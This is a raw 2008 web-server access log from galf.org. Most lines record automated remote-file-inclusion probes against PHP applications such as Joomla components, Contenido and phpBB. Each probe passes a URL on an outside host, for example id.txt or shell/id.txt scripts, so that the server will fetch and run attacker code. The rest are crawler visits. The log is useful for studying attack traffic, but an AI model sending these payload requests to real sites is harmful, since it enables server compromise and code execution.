85.214.111.118 - - [14/Apr/2008:07:06:43 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://nerdscience.com/robot.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.146.225.109 - - [14/Apr/2008:07:06:57 -0700] "GET /logs/access_071119.log/contenido/includes/include.grouprights_subnav.php?cfg[path][contenido]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.146.225.109 - - [14/Apr/2008:07:06:57 -0700] "GET /contenido/includes/include.grouprights_subnav.php?cfg[path][contenido]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.146.225.109 - - [14/Apr/2008:07:06:58 -0700] "GET /logs/contenido/includes/include.grouprights_subnav.php?cfg[path][contenido]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.111.118 - - [14/Apr/2008:07:07:16 -0700] "GET /logs/access_070826.log/newspublish/include.php?path[docroot]=http://nerdscience.com/robot.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.230.12.156 - - [14/Apr/2008:07:07:24 -0700] "GET /logs/access_080324.log/index.php4?lang=http://140.119.80.185/id2[1]-Naira.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.12.156 - - [14/Apr/2008:07:07:25 -0700] "GET /index.php4?lang=http://140.119.80.185/id2[1]-Naira.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.111.118 - - [14/Apr/2008:07:07:30 -0700] "GET /logs/access_070826.log/newspublish/include.php?path[docroot]=http://nerdscience.com/robot.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.148.95.154 - - [14/Apr/2008:07:08:00 -0700] "GET /logs/access_071119.log/contenido/includes/include.grouprights_subnav.php?cfg[path][contenido]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.148.95.154 - - [14/Apr/2008:07:08:00 -0700] "GET /contenido/includes/include.grouprights_subnav.php?cfg[path][contenido]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.148.95.154 - - [14/Apr/2008:07:08:00 -0700] "GET /logs/contenido/includes/include.grouprights_subnav.php?cfg[path][contenido]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
70.87.175.3 - - [14/Apr/2008:07:08:25 -0700] "GET /logs/access.log/main.php?page=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.87.175.3 - - [14/Apr/2008:07:08:25 -0700] "GET /main.php?page=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.87.175.3 - - [14/Apr/2008:07:08:25 -0700] "GET /logs/main.php?page=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.67.222.214 - - [14/Apr/2008:07:09:20 -0700] "GET /logs/access_070716.log/contrib/mx_glance_sdesc.php?mx_root_path=http://www.matilda-disco.com.ar/gg554/include/jpg.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.67.222.214 - - [14/Apr/2008:07:09:21 -0700] "GET /contrib/mx_glance_sdesc.php?mx_root_path=http://www.matilda-disco.com.ar/gg554/include/jpg.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.67.222.214 - - [14/Apr/2008:07:09:22 -0700] "GET /logs/contrib/mx_glance_sdesc.php?mx_root_path=http://www.matilda-disco.com.ar/gg554/include/jpg.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.148.95.154 - - [14/Apr/2008:07:09:59 -0700] "GET /logs/access.log/contenido/includes/include.grouprights_subnav.php?cfg[path][contenido]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
72.3.232.30 - - [14/Apr/2008:07:10:51 -0700] "GET /logs/access_080204.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
72.3.232.30 - - [14/Apr/2008:07:10:51 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
72.3.232.30 - - [14/Apr/2008:07:10:51 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
61.67.120.48 - - [14/Apr/2008:07:11:06 -0700] "GET /logs/access_070826.log/index.php?go=http://logistics.vec.go.th/cvrl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.18.243 - - [14/Apr/2008:07:11:59 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
74.6.26.38 - - [14/Apr/2008:07:11:59 -0700] "GET /logs/access.log HTTP/1.0" 200 54584 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
194.146.225.109 - - [14/Apr/2008:07:12:02 -0700] "GET /logs/access.log/contenido/includes/include.grouprights_subnav.php?cfg[path][contenido]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.232.153.112 - - [14/Apr/2008:07:13:12 -0700] "GET //toplist.php?f=toplist_top10&phpbb_root_path=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
66.232.153.112 - - [14/Apr/2008:07:13:12 -0700] "GET /logs//toplist.php?f=toplist_top10&phpbb_root_path=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
147.102.106.10 - - [14/Apr/2008:07:13:24 -0700] "GET /includes/search.php?GlobalSettings[templatesDirectory]=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
147.102.106.10 - - [14/Apr/2008:07:13:24 -0700] "GET /logs/includes/search.php?GlobalSettings[templatesDirectory]=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
208.111.154.104 - - [14/Apr/2008:07:14:34 -0700] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109" "www.galf.org"
208.111.154.104 - - [14/Apr/2008:07:14:34 -0700] "GET /cendoc/?D=D%C3%BB%C2%9D%3E%C3%97m%3C%C3%97%C2%9F=%C3%93 HTTP/1.0" 200 510 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109" "www.galf.org"
70.87.175.3 - - [14/Apr/2008:07:15:00 -0700] "GET /logs/access_071231.log/main.php?page=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.214.111.118 - - [14/Apr/2008:07:16:49 -0700] "GET /logs/access_071014.log/newspublish/include.php?path[docroot]=http://nerdscience.com/robot.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.111.118 - - [14/Apr/2008:07:16:49 -0700] "GET /logs/access_071014.log/newspublish/include.php?path[docroot]=http://nerdscience.com/robot.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.111.118 - - [14/Apr/2008:07:16:50 -0700] "GET /logs/access_071008.log//agendax/addevent.inc.php?agendax_path=http://nerdscience.com/robot.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.111.118 - - [14/Apr/2008:07:16:50 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://nerdscience.com/robot.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.111.118 - - [14/Apr/2008:07:16:51 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://nerdscience.com/robot.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.111.118 - - [14/Apr/2008:07:18:13 -0700] "GET /logs/access_071231.log//citywriter/head.php?path=http://nerdscience.com/robot.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.111.118 - - [14/Apr/2008:07:18:13 -0700] "GET //citywriter/head.php?path=http://nerdscience.com/robot.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.111.118 - - [14/Apr/2008:07:18:13 -0700] "GET /logs//citywriter/head.php?path=http://nerdscience.com/robot.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.111.118 - - [14/Apr/2008:07:18:18 -0700] "GET /logs/access_080114.log//agendax/addevent.inc.php?agendax_path=http://nerdscience.com/robot.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.34.218 - - [14/Apr/2008:07:18:33 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://200.220.215.214/~teste/xpl/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.galf.org"
85.214.34.218 - - [14/Apr/2008:07:18:35 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://200.220.215.214/~teste/xpl/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.galf.org"
90.158.114.6 - - [14/Apr/2008:07:18:50 -0700] "GET /logs/access.log/contenido/includes/include.grouprights_subnav.php?cfg[path][contenido]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
90.158.114.6 - - [14/Apr/2008:07:18:50 -0700] "GET /contenido/includes/include.grouprights_subnav.php?cfg[path][contenido]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
90.158.114.6 - - [14/Apr/2008:07:18:51 -0700] "GET /logs/contenido/includes/include.grouprights_subnav.php?cfg[path][contenido]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
90.158.114.6 - - [14/Apr/2008:07:19:06 -0700] "GET /logs/access_071210.log/contenido/includes/include.grouprights_subnav.php?cfg[path][contenido]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
147.102.106.10 - - [14/Apr/2008:07:19:42 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/renatas2/id21.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
147.102.106.10 - - [14/Apr/2008:07:19:43 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/renatas2/id21.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
64.185.237.35 - - [14/Apr/2008:07:20:11 -0700] "GET /logs/index.php?p=http://i-promo.info/on.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.galf.org"
64.185.237.35 - - [14/Apr/2008:07:20:16 -0700] "GET /index.php?p=http://i-promo.info/on.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
200.69.205.114 - - [14/Apr/2008:07:20:43 -0700] "GET /logs/access.log/contenido/includes/include.grouprights_subnav.php?cfg[path][contenido]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.69.205.114 - - [14/Apr/2008:07:20:44 -0700] "GET /contenido/includes/include.grouprights_subnav.php?cfg[path][contenido]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.69.205.114 - - [14/Apr/2008:07:20:44 -0700] "GET /logs/contenido/includes/include.grouprights_subnav.php?cfg[path][contenido]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.69.205.114 - - [14/Apr/2008:07:21:01 -0700] "GET /logs/access_071210.log/contenido/includes/include.grouprights_subnav.php?cfg[path][contenido]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
60.249.45.142 - - [14/Apr/2008:07:22:46 -0700] "GET /logs/access.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://logistics.vec.go.th/cvrl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
61.67.120.48 - - [14/Apr/2008:07:22:52 -0700] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://logistics.vec.go.th/cvrl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
61.67.120.48 - - [14/Apr/2008:07:22:54 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://logistics.vec.go.th/cvrl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
65.55.208.230 - - [14/Apr/2008:07:24:33 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.230 - - [14/Apr/2008:07:24:33 -0700] "GET /logs/access_070730.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
74.6.8.97 - - [14/Apr/2008:07:25:20 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.28.220 - - [14/Apr/2008:07:25:20 -0700] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.232.255.166 - - [14/Apr/2008:07:28:21 -0700] "GET /logs/access_070826.log/modules/My_eGallery/index.php?basepath=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.232.255.166 - - [14/Apr/2008:07:28:21 -0700] "GET /modules/My_eGallery/index.php?basepath=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.232.255.166 - - [14/Apr/2008:07:28:22 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
74.53.197.2 - - [14/Apr/2008:07:28:27 -0700] "GET /logs/access_070826.log/modules/My_eGallery/index.php?basepath=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.197.2 - - [14/Apr/2008:07:28:27 -0700] "GET /modules/My_eGallery/index.php?basepath=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.197.2 - - [14/Apr/2008:07:28:27 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.255.166 - - [14/Apr/2008:07:29:04 -0700] "GET /logs/access_070827.log/modules/My_eGallery/index.php?basepath=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
74.53.197.2 - - [14/Apr/2008:07:29:21 -0700] "GET /logs/access_070827.log/modules/My_eGallery/index.php?basepath=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.9.60 - - [14/Apr/2008:07:29:27 -0700] "GET /cendoc/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
200.105.35.14 - - [14/Apr/2008:07:32:53 -0700] "GET /logs/access_071231.log/index3.php?page=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.105.35.14 - - [14/Apr/2008:07:32:55 -0700] "GET /index3.php?page=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.105.35.14 - - [14/Apr/2008:07:32:56 -0700] "GET /logs/index3.php?page=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:07:36:50 -0700] "GET /logs/access_070820.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.westminsterakron.com/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:07:38:56 -0700] "GET /logs/access_080324.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.westminsterakron.com/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.8.30 - - [14/Apr/2008:07:39:04 -0700] "GET /logs/access_080211.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
200.80.42.159 - - [14/Apr/2008:07:39:47 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.buyindianproducts.com/includes/font//wellsfargo.com/_session/spreader.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
200.80.42.159 - - [14/Apr/2008:07:39:47 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.buyindianproducts.com/includes/font//wellsfargo.com/_session/spreader.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
200.80.42.159 - - [14/Apr/2008:07:39:47 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sentechmarketing.com/templates/c.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
200.80.42.159 - - [14/Apr/2008:07:39:47 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sentechmarketing.com/templates/c.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
200.80.42.159 - - [14/Apr/2008:07:39:47 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.buyindianproducts.com/includes/font/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
200.80.42.159 - - [14/Apr/2008:07:39:47 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.buyindianproducts.com/includes/font/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
193.178.145.180 - - [14/Apr/2008:07:41:12 -0700] "GET //index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.11.67.242 - - [14/Apr/2008:07:43:28 -0700] "GET /logs/access_071231.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.11.67.242 - - [14/Apr/2008:07:43:28 -0700] "GET /logs/access_071231.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.11.67.242 - - [14/Apr/2008:07:43:29 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.11.67.242 - - [14/Apr/2008:07:43:29 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.11.67.242 - - [14/Apr/2008:07:43:29 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.11.67.242 - - [14/Apr/2008:07:43:29 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.53.73.178 - - [14/Apr/2008:07:44:05 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
74.53.73.178 - - [14/Apr/2008:07:44:05 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
200.11.67.242 - - [14/Apr/2008:07:44:14 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.145.232.237 - - [14/Apr/2008:07:44:16 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
85.145.232.237 - - [14/Apr/2008:07:44:16 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.galf.org"
200.11.67.242 - - [14/Apr/2008:07:44:17 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.32.199.201 - - [14/Apr/2008:07:44:25 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.fusionn.com/fnn/clients/smarty_old/templates_c/.errors.php/.st/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
72.32.199.201 - - [14/Apr/2008:07:44:25 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.fusionn.com/fnn/clients/smarty_old/templates_c/.errors.php/.st/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
200.105.35.14 - - [14/Apr/2008:07:46:39 -0700] "GET /logs/access.log/index2.php?page=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.105.35.14 - - [14/Apr/2008:07:46:41 -0700] "GET /index2.php?page=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.105.35.14 - - [14/Apr/2008:07:46:42 -0700] "GET /logs/index2.php?page=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.171.66.229 - - [14/Apr/2008:07:47:03 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.171.66.229 - - [14/Apr/2008:07:47:03 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.11.67.242 - - [14/Apr/2008:07:47:38 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
65.98.114.26 - - [14/Apr/2008:07:47:39 -0700] "GET /logs/access_080114.log//init_basic.php?GALLERY_BASEDIR=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.114.26 - - [14/Apr/2008:07:47:40 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.114.26 - - [14/Apr/2008:07:47:41 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.114.26 - - [14/Apr/2008:07:47:41 -0700] "GET /logs/access_071231.log//init_basic.php?GALLERY_BASEDIR=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.11.67.242 - - [14/Apr/2008:07:47:50 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.29.87.105 - - [14/Apr/2008:07:48:41 -0700] "GET /logs/access_071008.log/index.php?site=http://www.spicyradio.net/plugins/p2006???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.29.87.105 - - [14/Apr/2008:07:48:41 -0700] "GET /index.php?site=http://www.spicyradio.net/plugins/p2006???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.29.87.105 - - [14/Apr/2008:07:48:41 -0700] "GET /logs/index.php?site=http://www.spicyradio.net/plugins/p2006???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
74.6.9.157 - - [14/Apr/2008:07:49:25 -0700] "GET /cendoc/pdf/Galf-Ese-secreto.pdf HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
217.171.66.229 - - [14/Apr/2008:07:50:20 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.171.66.229 - - [14/Apr/2008:07:50:20 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/albh/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
